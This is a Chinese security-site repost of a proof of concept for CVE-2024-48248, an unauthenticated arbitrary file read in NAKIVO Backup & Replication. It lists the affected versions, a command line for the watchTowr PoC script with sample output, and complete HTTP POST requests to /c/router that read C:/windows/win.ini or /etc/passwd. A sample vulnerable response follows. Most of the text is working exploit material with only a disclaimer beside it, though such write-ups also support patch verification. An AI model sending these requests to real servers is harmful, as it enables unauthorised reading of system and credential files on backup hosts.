nakivo-任意文件读取(CVE-2024-48248)

admin
admin
admin
139164
文章
114
评论
2025年3月18日21:12:54评论20 views字数 2447阅读8分9秒阅读模式

漏洞验证获取地址在文章末尾

受影响的版本:NAKIVO 的 10.11.3.86570 及以下版本
使用方法:
python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\windows\win.ini"         __  _  ______ _/  |__ ____ |  |___    ________  _  ________           / / __      ___/ ___|  |  |    | /  _  / / _  __                / / __ |  |   ___|   Y  |    |(  <_>      / |  | /           /_/ (____  |__|  ___  |___|__|__  | __  / /_/  |__|                                     /          /     /                                    watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py        (*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr          - Sonny , watchTowr ([email protected])        CVEs: [CVE-2024-48248][*] Targeting https://192.168.1.1:4443[*] Attempting to read file 'C:windowswin.ini'[*] File Contents:for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1
原分析文章分析出处:
https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
手动验证:
发送如下数据包
windows
POST /c/router HTTP/1.1Host: {{Hostname}Content-Type: application/jsonConnection: keep-aliveContent-Length: 121{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}
linux
POST /c/router HTTP/1.1Host: {{Hostname}Content-Type: application/jsonConnection: keep-aliveContent-Length: 121{"action":"STPreLoadManagement","method":"getImageByPath","data":["/etc/passwd"],"type":"rpc","tid":3980,"sid":""}
若响应包为这种,则存在漏洞:
HTTP/1.1 200 
POST /c/router HTTP/1.1Host: {{Hostname}Content-Type: application/jsonConnection: keep-aliveContent-Length: 121{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}Vary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersStrict-Transport-Security: max-age=31536000; includeSubDomainsCache-Control: max-age=0Content-Type: text/html;charset=UTF-8Content-Language: en-USContent-Length: 466Keep-Alive: timeout=60Connection: keep-alive{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980","type":"rpc","message":null,"where":null,"cause":null,"data":[59,32,102,111,114,32,49,54,45,98,105,116,32,97,112,112,32,115,117,112,112,111,114,116,13,10,91,102,111,110,116,115,93,13,10,91,101,120,116,101,110,115,105,111,110,115,93,13,10,91,109,99,105,32,101,120,116,101,110,115,105,111,110,115,93,13,10,91,102,105,108,101,115,93,13,10,91,77,97,105,108,93,13,10,77,65,80,73,61,49,13,10]}
nakivo-任意文件读取(CVE-2024-48248)

原文始发于微信公众号(爱坤sec):nakivo-任意文件读取(CVE-2024-48248)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日21:12:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nakivo-任意文件读取(CVE-2024-48248)https://cn-sec.com/archives/3852648.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息